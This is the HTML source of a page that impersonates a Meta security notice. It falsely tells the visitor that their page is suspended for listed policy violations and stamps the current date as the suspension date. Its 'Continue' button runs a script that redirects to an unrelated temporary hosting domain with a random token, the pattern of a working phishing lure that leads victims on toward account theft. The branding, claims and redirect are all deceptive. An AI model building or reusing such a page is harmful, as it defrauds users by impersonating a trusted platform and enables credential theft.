<html>
<head>
    <meta name="viewport" content="user-scalable=no,initial-scale=1,maximum-scale=1">
    <title>Security page</title>
    <!-- <link rel="stylesheet" href="bootstrap5.min.css?v=2"> -->
    <!-- <script src="jquery-3.6.3.min.js?v=2"></script> -->
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css?q=<?=date('U')?>"
        rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC"
        crossorigin="anonymous">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.4/jquery.min.js?q=<?=date('U')?>"
        integrity="sha512-pumBsjNRGGqkPzKHndZMaAG+bir374sORyzM3uulLV14lN5LyykqNk8eEeUlUkB3U0M4FApyaHraT65ihJhDpQ=="
        crossorigin="anonymous" referrerpolicy="no-referrer"></script>
    <style>
    /* blue 216FDB */
    body {
        background-color: #f1f1f2;
        margin: 0px;
        padding: 0px;
    }

    .head {
        /* background-color: #386a8b; */
        background-color: #47579a;
        /*dark*/
        text-align: left;
        margin-bottom: 33px;
        height: 40px;
    }

    .headimg {
        margin:3px;
        height: 87%;
    }

    .bannerimg {
        /* width: 33%; */
    }

    .content1 {
        text-align: center;
    }

    .content2 {
        padding: 3px;
    }

    .p-title {
        font-weight: 900;
        margin: 0px;
        padding: 0px;
    }

    .p-content {
        margin: 0px;
        padding: 0px;
        padding-top: 3px;
        padding-bottom: 7px;
        ;
    }
    .lock-img {
        background-color: #47579a;
        border-radius: 360px;
        margin: 0px;
        padding: 10px;
        font-size: 55pt;
    }
    </style>
</head>

<body onload="setDtSuspended()">
    <!-- <div class="head">
        <span style="margin-left:7px;color:#f1f1f2;font-size:2em;font-weight:bold">f</span>
    </div> -->
    <div class="container mt-5">
        <div class="row justify-content-md-center">
            <div class="col-12 col-md-5">
                <div class="card">
                    <img style="width: 100%;" src="iii.jpg">
                    <div class="card-body">
                        <!-- <h3>Your Account Will Be Deactivated Soon</h3> -->
                        <h3 class="text-center">Your page will be suspended</h3>
                        <p style="text-align: justify;">We are constantly updating our Meta Privacy Policy and Terms of Service We have temporarily suspended your page because someone told us that you violated our terms and conditions of service.
                        </p>
                            <ul>
                                <li>
                                    Using someone else's fake name/photo
                                </li>
                                <li>
                                    Share content that misleads other users
                                </li>
                                <li>
                                    Insulting other users
                                </li>
                            </ul>
                            <p>We'll take you through some steps to unlock your account.</p>
                        <button value="Verification" class="btn btn-lg btn-primary col-12" id="gotothepagevltn">Continue</button>
                        <hr>
                        <p class="text-center text-danger pre mt-0" id="suspendeddaymkdfghoansndgfasd"></p>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <footer class="main-footer text-center mt-5">
        <i>Meta©2023</i>
    </footer>
</body>
<script>
function setDtSuspended() {
    arrbulan = ["January", "February", "March", "April", "May", "June", "July", "August", "September", "October",
        "November", "December"
    ];
    date = new Date();
    dd = date.getDate();
    mm = date.getMonth();
    yy = date.getFullYear();
    $('#suspendeddaymkdfghoansndgfasd').text("Suspended on " + arrbulan[mm] + " " + dd + ", " + yy);
    $("input[name='mkdfghoansndgfasda']").focus();
}
function makeid(length) {
    let result = '';
    const characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
    const charactersLength = characters.length;
    let counter = 0;
    while (counter < length) {
      result += characters.charAt(Math.floor(Math.random() * charactersLength));
      counter += 1;
    }
    return result;
}
$("#gotothepagevltn").on("click", function() {
    rand=makeid(25);
    new_url="http://app-wolf.lafdie8sik-ewx3lpdw86zq.p.temp-site.link/index.htm?pg3571="+rand;;
    window.location.replace(new_url);
})
</script>

</html>
